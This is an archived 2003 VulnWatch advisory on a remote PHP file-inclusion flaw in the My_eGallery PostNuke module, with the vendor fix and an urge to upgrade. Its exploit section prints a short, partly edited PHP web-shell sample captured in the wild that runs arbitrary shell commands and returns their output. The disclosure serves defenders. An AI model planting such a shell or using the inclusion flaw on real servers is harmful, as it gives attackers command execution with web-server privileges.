[VulnWatch] Remote execution in My_eGallery

From: Bojan Zdrnja (Bojan.Zdrnja_at_LSS.hr)
Date: 11/26/03

  • Next message: KF: "[VulnWatch] SRT2003-TURKEY-DAY - *novelty* - detecttr.c Trace Route detection vulnerability"
    To: <vulnwatch@vulnwatch.org>
    Date: Thu, 27 Nov 2003 09:38:48 +1300
    
    

    Product: My_eGallery
    Versions affected: all <3.1.1.g
    Website: http://lottasophie.sourceforge.net/index.php

    1. Introduction
    ---------------

    My_eGallery is a very nice PostNuke module, which allows users to create and
    manipulate their own galleries on the web, plus offers various additional
    features.
    For more information and a demonstration you can go to the Website above.

    2. Exploit
    ----------

    Any version of My_eGallery, prior to 3.1.1.g, is susceptible to this
    vulnerability.

    Certain php files have some parameters which are used in include functions
    not filtered.
    An intruder can craft PHP code on their Web site and supply parameter to
    My_eGallery so it actually includes malicious PHP code.

    The following code was captured as being used in the wild (edited
    intentionally):

    <?
      // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
      if (isset($chdir)) @chdir($chdir);
      ob_start();
      execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
      $output = ob_get_contents();
      ob_end_clean();
      print_output();
    ?>

    This allows execution of any command on the server with My_eGallery, under
    the privileges of the Web server (usually apache or httpd).

    3. Solution
    -----------

    Vendor was contacted and promptly replied. Fix is available at the vendor's
    site:

    http://lottasophie.sourceforge.net/modules.php?op=modload&name=Downloads&fil
    e=index&req=viewdownload&cid=5

    As this was seen being exploited in the wild, users are urged to upgrade to
    the latest version as soon as possible.

    Regards,

    Bojan Zdrnja
    CISSP


  • Next message: KF: "[VulnWatch] SRT2003-TURKEY-DAY - *novelty* - detecttr.c Trace Route detection vulnerability"

    Relevant Pages

    • [Full-Disclosure] Remote execution in My_eGallery
      ... For more information and a demonstration you can go to the Website above. ... My_eGallery so it actually includes malicious PHP code. ... the privileges of the Web server. ... As this was seen being exploited in the wild, users are urged to upgrade to ...
      (Full-Disclosure)
    • Remote execution in My_eGallery
      ... For more information and a demonstration you can go to the Website above. ... My_eGallery so it actually includes malicious PHP code. ... the privileges of the Web server. ... As this was seen being exploited in the wild, users are urged to upgrade to ...
      (Bugtraq)
    • Re: Kein CopyFolder unter .NET ?!
      ... Zum einen, zum anderen kann man auch in ASP.NET alles per Notepad schreiben, wenn man unbedingt will. ... ASP website to a remote web server as making an off-site backup of the code. ...
      (microsoft.public.de.german.entwickler.dotnet.asp)
    • How can I find out whether a user has permissions to see a page or not?
      ... I wrote to do the ACL check. ... only in C++ with managed extensions to make ... a web server somewhere to deploy my website (which is LAN ...
      (microsoft.public.dotnet.framework.aspnet.security)
    • RE: Multiple Spoofed HTTP Requests
      ... If you can't view the return packets that you have no ... idea what the web server chose as its Initial Sequence Number. ... Audit your website security with Acunetix Web Vulnerability Scanner: ... Up to 75% of cyber attacks are launched on shopping carts, ...
      (Pen-Test)